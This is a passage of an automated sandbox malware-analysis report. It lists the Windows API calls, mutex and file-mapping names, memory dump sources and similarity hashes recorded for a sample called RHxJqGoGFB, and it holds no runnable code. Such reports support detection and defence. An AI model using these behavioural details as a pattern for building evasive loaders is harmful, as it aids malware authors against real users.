• Sleep.KERNEL32(00004E20), ref: 00901EC6
  • Part of subcall function 00901D8F: GetFileAttributesA.KERNEL32(00000000), ref: 00901E3D
  • Part of subcall function 00901D8F: Sleep.KERNEL32(00000100), ref: 00901E73
• Sleep.KERNEL32(00057E40), ref: 00901EE0
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: Sleep$AttributesCloseEnumExitFileOpenThreadUserValue
• String ID:
• API String ID: 3734488975-0
                                                                                                            • Opcode ID: 32113ee59ba9030dbb9034d1e4e0619f025baad0d3f56925f8a6377997fe10a5
                                                                                                            • Instruction ID: e6d4683e00ac5ddd14b682090066d931a5a2c80885bdedfdf26b1c0a7c036de8
                                                                                                            • Instruction Fuzzy Hash: 39E012BA645304BFEA0167A0FC0EF1B3759BF59746F445222FB06852D0DA72D4008662
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009024BB
                                                                                                            • CloseHandle.KERNEL32(?), ref: 009024DB
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009024F3
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 009024FA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleHeap$FreeProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 4176491614-0
                                                                                                            • Opcode ID: 9b940997005f161f15e7a28e78b2c6f81d1ccfaa8d6b3a5ae262a4a450a3c222
                                                                                                            • Instruction ID: 681b4e6dc337d1e511d1f06429035bc5d138342e21fd76a4f3933710e6052619
                                                                                                            • Instruction Fuzzy Hash: AEF0B279E01258DBEF248BA8D84D7EDB774FB48322F00869AEA1992290C77459D4CF60
                                                                                                            APIs
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00403F01
                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00403FB0
                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 00404139
                                                                                                              • Part of subcall function 004041C0: KiUserExceptionDispatcher.NTDLL(?,00404168), ref: 004041C6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocCreateDispatcherExceptionLibraryLoadMutexUserVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 913672479-0
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: 4c255a9ca1704f3bfdc674421c9317b92510fa80918e0642c738ddf0f5b3c1fa
                                                                                                            • Instruction Fuzzy Hash: 6AB11975A002898FEB10CF14CC44BA937A5FF54305F484526DD09BF3A1D37AAA95CB4E
                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(00000000,008F2100), ref: 00901D3C
                                                                                                            • GetDriveTypeA.KERNEL32(00000000), ref: 00901D55
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00901D80
                                                                                                              • Part of subcall function 00901060: Sleep.KERNEL32(?,?), ref: 009010BF
                                                                                                              • Part of subcall function 00901060: lstrcat.KERNEL32(?,008F3D20), ref: 009010DD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DriveExitSleepThreadTypeUserlstrcatlstrcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899959655-0
                                                                                                            • Opcode ID: 292819fdab8085bffb2cdc400faec72e52117a680f3a0be448a5705660d1f3fb
                                                                                                            • Instruction ID: 3602bb0b3acaa28a589fd7babb0efece329f93e5c66f14fa103bcec9e8812954
                                                                                                            • Instruction Fuzzy Hash: 1E11A131A00218AFDB258B68CC05BEAB7B9BF58B00F0001E9F709A7291DB705A44CB91
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 008F42B3
                                                                                                            • Sleep.KERNEL32(00004E20), ref: 008F42D4
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F42DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitObjectSingleSleepThreadUserWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 295063474-0
                                                                                                            • Opcode ID: fbd89994c7ad94da6f0b0e4c1b03d2b0cac7d66c14d0302bae7df27fe9dda874
                                                                                                            • Instruction ID: bcfb09afc70c481863de1a0a213dc81f5ff5607c893415d1cc4febdd157dbc87
                                                                                                            • Instruction Fuzzy Hash: 25014B7061520CEBEB04CFA4ED09BBA77B5FB41709F205266F701E6280D7B29E50EB51
                                                                                                            APIs
                                                                                                              • Part of subcall function 008FA75A: GetTempPathA.KERNEL32(00000080,00000000,?), ref: 008FA78C
                                                                                                              • Part of subcall function 008FA75A: lstrlen.KERNEL32(00000000), ref: 008FA796
                                                                                                              • Part of subcall function 008FA75A: lstrcat.KERNEL32(00000000,008F3CC0), ref: 008FA7B2
                                                                                                              • Part of subcall function 008FA75A: lstrcpy.KERNEL32(00000000,00000000), ref: 008FA7CF
                                                                                                              • Part of subcall function 008FA75A: lstrlen.KERNEL32(00000000,008F2880,00000000), ref: 008FA7FD
                                                                                                              • Part of subcall function 008FA75A: wsprintfA.USER32 ref: 008FA809
                                                                                                            • CreateFileA.KERNEL32(0090382E,40000000,00000002,00000000,00000004,00000020,00000000,?,0090382E), ref: 0090302B
                                                                                                            • WriteFile.KERNEL32(000000FF,008D26B0,00000401,00000000,00000000), ref: 0090304E
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 00903058
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Filelstrlen$CloseCreateHandlePathTempWritelstrcatlstrcpywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 817978534-0
                                                                                                            • Opcode ID: 77b660f86acc22a26e5c8b79b20a8559bf6ba44e94e08be4785a32f78e49d3c3
                                                                                                            • Instruction ID: 302ff8365db82162e6a5ba33398746952bef96990d40f952c0fbc377e0cd67fb
                                                                                                            • Instruction Fuzzy Hash: DDF030B5A40308BBEF14AFA4DC4EF9E7B38AB44711F104655FB05AA3C0D6B19A448791
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 009008E2
                                                                                                            • RtlLeaveCriticalSection.NTDLL(00909018), ref: 009008F4
                                                                                                            • Sleep.KERNEL32(00000400), ref: 0090090F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalFreeGlobalLeaveSectionSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 2599486065-0
                                                                                                            • Opcode ID: d651be68e494bc868d9366591640c180c4bf37bd203afd0347ab4bd2b97f3338
                                                                                                            • Instruction ID: ed42b2aff20ac6fff53661d509577909a4914f81c46ddb690a1f0ca41d39393c
                                                                                                            • Instruction Fuzzy Hash: 8CF03476A0121ADBDF249F84D8097EDB774FF84325F00426AEA25A26C1D7391901CF40
                                                                                                            APIs
                                                                                                            • IsBadWritePtr.KERNEL32(00000110,00000000), ref: 008F8B3E
                                                                                                            • Sleep.KERNEL32(00001770), ref: 008F8B8E
                                                                                                            • Sleep.KERNEL32(0001D4C0), ref: 008F8BB0
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 008F8CD2
                                                                                                            • Sleep.KERNEL32(0043001E), ref: 008F8D9D
                                                                                                            • Sleep.KERNEL32(001B7740), ref: 008F8DAA
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F8DD0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$ExitThreadUserWritelstrcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3664100127-0
                                                                                                            • Opcode ID: 64294c1de915610038742f192a8c3fac3b3f370bdfb8964273f235602b8c83f0
                                                                                                            • Instruction ID: 5217cccad85a00ce3a89444fcd09fe8ac09eda53c5a17ad27be00a26035caa65
                                                                                                            • Instruction Fuzzy Hash: A6415DB1A0511CCBCB64DB24CCD4BB9B7B5FF84305F0480AAD60A96242EB346EC5DF59
                                                                                                            APIs
                                                                                                            • MapViewOfFile.KERNEL32(000001C8,00000006,00000000,00000000,00015400), ref: 008FC8D1
                                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 008FC900
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileView$Unmap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3282598733-0
                                                                                                            • Opcode ID: 58840b2b968ac866758956c5f9b7d50fe97c6974d433aa11ba3c9c0094183ebb
                                                                                                            • Instruction ID: a54aba307401dab4df84d45e3c27b8d9a94393dda9b8e5b38e85ea7762dadbba
                                                                                                            • Instruction Fuzzy Hash: FFF06975A4020CFBCB10DFA4DD4DBAD7B74BB04345F204244EA186B2D0D7B55A84DB44
                                                                                                            APIs
                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 008FA295
                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 008FA29F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesDelete
                                                                                                            • String ID:
                                                                                                            • API String ID: 2910425767-0
                                                                                                            • Opcode ID: 83869bfbee7a0f118fe5b1e5dea3bc9e749c054532c75315133eb7d17c5948b3
                                                                                                            • Instruction ID: 465ca5b173d2e9dee7c640a579d6112becc497769c8c86e4d279bf2fee55fb5b
                                                                                                            • Opcode Fuzzy Hash: 83869bfbee7a0f118fe5b1e5dea3bc9e749c054532c75315133eb7d17c5948b3
                                                                                                            • Instruction Fuzzy Hash: DBE012B530430CBBDB085B70DC0DB763758FF54764F204512FB0ECA151E576D5449A52
                                                                                                            APIs
                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,008F2104), ref: 008F62A8
                                                                                                            • MapViewOfFile.KERNEL32(000001A0,00000006,00000000,00000000,00008000), ref: 008F62CE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateMappingView
                                                                                                            • String ID:
                                                                                                            • API String ID: 3452162329-0
                                                                                                            • Opcode ID: 4571d4d3a326a5bb3d361b72bee5dff2dac731a81c4f45670c91817f840988cf
                                                                                                            • Instruction ID: 0ea71d4e2fa8f281e03daeb34c45ca1eb3fff7152b061505c744886748f44bba
                                                                                                            • Opcode Fuzzy Hash: 4571d4d3a326a5bb3d361b72bee5dff2dac731a81c4f45670c91817f840988cf
                                                                                                            • Instruction Fuzzy Hash: E5F0C9746A9300AFF7209F64FC4AB5137B8B744B24F208209FB155A2E2D7B66488DB54
                                                                                                            APIs
                                                                                                            • FindClose.KERNEL32(00000000), ref: 009014B5
                                                                                                            • Sleep.KERNEL32(00000400), ref: 009014C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFindSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 1358061995-0
                                                                                                            • Opcode ID: c87bd0748c825760a720da42cd86bec7cb1bccacc9af05ee0a07729627e3e155
                                                                                                            • Instruction ID: 24c67a1807e7782516078d4f80fa9899c884259aa68fad80638cc64248c69325
                                                                                                            • Opcode Fuzzy Hash: c87bd0748c825760a720da42cd86bec7cb1bccacc9af05ee0a07729627e3e155
                                                                                                            • Instruction Fuzzy Hash: 95E08C76A00608DFCF10DF94E8497ADB770FB48322F00436ADA15A32D0C7390841CBA0
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0001F200), ref: 009037F4
                                                                                                              • Part of subcall function 00902FFF: CreateFileA.KERNEL32(0090382E,40000000,00000002,00000000,00000004,00000020,00000000,?,0090382E), ref: 0090302B
                                                                                                              • Part of subcall function 00902FFF: WriteFile.KERNEL32(000000FF,008D26B0,00000401,00000000,00000000), ref: 0090304E
                                                                                                              • Part of subcall function 00902FFF: CloseHandle.KERNEL32(000000FF), ref: 00903058
                                                                                                            • Sleep.KERNEL32(00004E20), ref: 00903852
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocCloseCreateGlobalHandleSleepWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 653111876-0
                                                                                                            • Opcode ID: 9c6d90d4f7ae9de27009598b97e8d6cfd309e516454a7f2bced2e8a2fe7eed3d
                                                                                                            • Instruction ID: 05858dffbef3c8357497d450b34ac636bf9a6ee6bae7c4ecd8a3e3b45d848faa
                                                                                                            • Opcode Fuzzy Hash: 9c6d90d4f7ae9de27009598b97e8d6cfd309e516454a7f2bced2e8a2fe7eed3d
                                                                                                            • Instruction Fuzzy Hash: 414174B2914218AFDB24DB68DC52BE9B379BB58300F0085E5F70DE7281DB756B848F91
                                                                                                            APIs
                                                                                                            • wsprintfA.USER32 ref: 008F5983
                                                                                                            • wsprintfA.USER32 ref: 008F5AF0
                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 008F5B2D
                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 008F5BFB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wsprintf$CloseQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 2158237808-0
                                                                                                            • Opcode ID: 7d96f63e052d9640e0aa03f351474aaa21fdd7d8e82ef8580147202f07693b1b
                                                                                                            • Instruction ID: b6f9966f5f3c5a5d5ea44c371b335802d2d557ba81e9b2d4c18949ad5630c0b8
                                                                                                            • Opcode Fuzzy Hash: 7d96f63e052d9640e0aa03f351474aaa21fdd7d8e82ef8580147202f07693b1b
                                                                                                            • Instruction Fuzzy Hash: A7F0E730A0151CDBCB24DFA8E9887A9B7B5FF48319F1442DAD60AA7251C7749E90DE44
                                                                                                            APIs
                                                                                                            • KiUserExceptionDispatcher.NTDLL(?,00404168), ref: 004041C6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 6842923-0
                                                                                                            • Opcode ID: c8f7c87faae4f4379b3fccb25882370ad6c9884bf352f412aa7a75093acdeb8a
                                                                                                            • Instruction ID: 8859ecbdd4533cbe9e394e21547837cab7727e605e906859d16431a079c461d0
                                                                                                            • Opcode Fuzzy Hash: c8f7c87faae4f4379b3fccb25882370ad6c9884bf352f412aa7a75093acdeb8a
                                                                                                            • Instruction Fuzzy Hash: 01D0A7B42002044FDF54CF358908038BAE4EF99310B51057CE4C5EB360E7749D409B05
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountExchangeInterlockedTick
                                                                                                            • String ID: x$z${
                                                                                                            • API String ID: 3499635708-1334427886
                                                                                                            • Opcode ID: c703dfa854dc04d1a6e0cb145cd87ffdc26433107659879908e82559c1841a57
                                                                                                            • Instruction ID: 59c2255ee4c8b876349a89211e73f0b18b0ada1c8a0e316dbed14df9ac23f0dd
                                                                                                            • Opcode Fuzzy Hash: c703dfa854dc04d1a6e0cb145cd87ffdc26433107659879908e82559c1841a57
                                                                                                            • Instruction Fuzzy Hash: 02622BB1E0010EDFCB04DFA8C981ABE77B1FF98314F248229E619E7281D7349A55DB95
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8f907cf3964e031144e6f630bff2b0851759c15c7df66bdbf2677b0f3875127b
                                                                                                            • Instruction ID: 2ac79933e0a9865d0d7533d8f72e0d0ffda6034e88cdbb163b71e03dcf13cc7d
                                                                                                            • Opcode Fuzzy Hash: 8f907cf3964e031144e6f630bff2b0851759c15c7df66bdbf2677b0f3875127b
                                                                                                            • Instruction Fuzzy Hash: 02711C74E0424A8FDB08CF69C4507BFBBB2EF89304F18C469D955AB381D7359A12CB90
                                                                                                            APIs
                                                                                                            • LoadLibraryExA.KERNELBASE(KERNEL32.DLL,00000000,00000000), ref: 0097D831
                                                                                                            • SetErrorMode.KERNEL32(00008002), ref: 0097D858
                                                                                                            • CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,hh8geqpHJTkdns6), ref: 0097D872
                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_7728), ref: 0097D88C
                                                                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 0097D8A2
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,0097EED8,000001FE), ref: 0097D935
                                                                                                            • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0097D954
                                                                                                            • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0097D962
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0097D98F
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 0097D996
                                                                                                            • Sleep.KERNEL32(000927C0), ref: 0097D9A5
                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 0097D9AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Create$ErrorLibraryLoadMapping$AddressExitLastModeModuleMutexNameProcProcessSleepView
                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 3566498206-162185446
                                                                                                            • Opcode ID: c54cde7ec83a3bae0523b54c49bb16d0c2bc73c4507ee6bb323365d066d2b875
                                                                                                            • Instruction ID: 5e9954dee9583d03e747c28a5ef98bf29c8e86bafa0e794dd92df4a7355570a6
                                                                                                            • Opcode Fuzzy Hash: c54cde7ec83a3bae0523b54c49bb16d0c2bc73c4507ee6bb323365d066d2b875
                                                                                                            • Instruction Fuzzy Hash: 2D616C72641288ABEF10DF60CD49FEA3778EF44B05F548415EE0DBE1E0D6B1AA448B1E
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,000000F8), ref: 008F976E
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 008F977B
                                                                                                            • lstrcat.KERNEL32(00000000,008F3C94), ref: 008F979A
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 008F97CD
                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 008F983B
                                                                                                              • Part of subcall function 008FA75A: GetTempPathA.KERNEL32(00000080,00000000,?), ref: 008FA78C
                                                                                                              • Part of subcall function 008FA75A: lstrlen.KERNEL32(00000000), ref: 008FA796
                                                                                                              • Part of subcall function 008FA75A: lstrcat.KERNEL32(00000000,008F3CC0), ref: 008FA7B2
                                                                                                              • Part of subcall function 008FA75A: lstrcpy.KERNEL32(00000000,00000000), ref: 008FA7CF
                                                                                                              • Part of subcall function 008FA75A: lstrlen.KERNEL32(00000000,008F2880,00000000), ref: 008FA7FD
                                                                                                              • Part of subcall function 008FA75A: wsprintfA.USER32 ref: 008FA809
                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 008F9860
                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000001), ref: 008F9875
                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000001), ref: 008F9895
                                                                                                            • GlobalFree.KERNEL32(?), ref: 008F98B8
                                                                                                            • GetProcAddress.KERNEL32(00000000,008F2294), ref: 008F98CB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
